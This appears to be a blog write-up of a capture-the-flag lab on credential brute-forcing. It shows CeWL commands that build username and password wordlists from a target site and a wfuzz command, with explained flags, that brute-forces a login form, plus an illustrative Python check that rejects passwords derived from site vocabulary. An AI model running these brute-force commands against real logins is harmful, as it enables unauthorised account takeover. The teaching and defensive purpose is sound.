Post 54 - Brr
Task 10, Day 04, Brute-forcing Baby, it’s CeWLd outside
CeWL is a custom wordlist generator that spiders websites to create word lists based on the site’s content. This capability helps in brute-forcing and uncovering hidden directories using organization-specific terminology. It can also compile lists of email addresses or usernames from team member pages.
Create basic list:
cewl http://ADDRESS
Create and save list to file:
cewl http://ADDRESS -w FILENAME.txt
Since it’s a CLI tool, it can be easily integrated into automated workflows, and its output can be fed directly into other tools.
In this case, use wfuzz to make use of the generated lists:
wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://ADDRESS/login.php -d "username=FUZZ&password=FUZ2Z"
-c : output with colors
-z file,usernames.txt : loads the usernames list
-z file,passwords.txt : uses the password list generated by CeWL
--hs "Please enter the correct credentials" : hides responses containing the defined string
-u : target URL
-d "username=FUZZ&password=FUZ2Z" : provides POST data format to use and variables to replace
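The same idea turned around for defence: a site-derived wordlist works because people pick passwords from their organization's own vocabulary, so a password policy can build that vocabulary from the site and reject matches. This is an added example, not code from the original post or from CeWL; the sample HTML, the names in it, the minimum word length and the function names are all constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page standing in for an organization's own site content.
SAMPLE_HTML = """
<html><head><title>Northpole Logistics</title><style>p{color:red}</style></head>
<body><h1>Meet the team</h1>
<p>Isaias leads the Sleigh workshop; Marcus runs the Reindeer stables.</p>
<script>var tracking = "ignored";</script></body></html>
"""

class _TextExtractor(HTMLParser):
    """Collects visible text, skipping script and style bodies."""
    def __init__(self):
        super().__init__()
        self.chunks, self._skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1
    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)

def site_words(html, min_len=3):
    """Lower-cased words of at least min_len letters (assumed cutoff) in the page text."""
    parser = _TextExtractor()
    parser.feed(html)
    words = re.findall(r"[A-Za-z]+", " ".join(parser.chunks))
    return {w.lower() for w in words if len(w) >= min_len}

_LEET = str.maketrans("013457@$!", "oieastasi")   # common character swaps
_TAIL = re.compile(r"[\d\W_]+$")                  # trailing digits and symbols

def candidates(password):
    """Base words a password may be built on: strip the tail and undo leet, in both orders."""
    low = password.lower()
    return {_TAIL.sub("", low).translate(_LEET), _TAIL.sub("", low.translate(_LEET))}

def is_site_derived(password, words):
    """True if any normalized form of the password is a word taken from the site."""
    return not candidates(password).isdisjoint(words)

if __name__ == "__main__":
    vocab = site_words(SAMPLE_HTML)
    for pw in ["Reindeer2023!", "Sl3igh", "marcu5", "T7#qLm9!vZx2"]:
        print(pw, "->", "reject" if is_site_derived(pw, vocab) else "ok")
```

Pair a check like this with rate limiting or lockout on the login form, since it only covers passwords built on a single site word.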
The Task
Generate username and password word lists from the website, then use wfuzz to find the credentials that work and grab the flag from the email.
Flag gotten.
Recommended room
Web Enumeration